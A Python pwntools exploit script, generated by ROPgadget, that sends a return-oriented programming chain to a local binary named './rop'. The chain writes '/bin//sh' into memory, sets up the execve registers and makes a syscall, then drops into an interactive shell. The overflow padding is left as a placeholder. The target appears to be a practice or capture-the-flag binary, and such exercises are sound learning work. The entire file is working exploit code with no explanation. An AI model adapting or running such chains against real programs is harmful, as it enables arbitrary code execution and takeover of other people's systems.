#!/usr/bin/env python3
# execve generated by ROPgadget

from struct import pack
from pwn import *

# Padding goes here

p = b''

r = process('./rop')

p +=  p64(0x00000000004077ce) # pop rsi ; ret
p +=  p64(0x00000000004b2000) # @ .data
p +=  p64(0x00000000004437e3) # pop rax ; ret
p += b'/bin//sh'
p +=  p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
p +=  p64(0x00000000004077ce) # pop rsi ; ret
p +=  p64(0x00000000004b2008) # @ .data + 8
p +=  p64(0x0000000000439720) # xor rax, rax ; ret
p +=  p64(0x0000000000445171) # mov qword ptr [rsi], rax ; ret
p +=  p64(0x00000000004017de) # pop rdi ; ret
p +=  p64(0x00000000004b2000) # @ .data
p +=  p64(0x00000000004077ce) # pop rsi ; ret
p +=  p64(0x00000000004b2008) # @ .data + 8
p +=  p64(0x00000000004016fb) # pop rdx ; ret
p +=  p64(0x00000000004b2008) # @ .data + 8
p +=  p64(0x0000000000439720) # xor rax, rax ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x00000000004660d0) # add rax, 1 ; ret
p +=  p64(0x000000000040120b) # syscall


# print(p)

r.sendline(p)
r.interactive()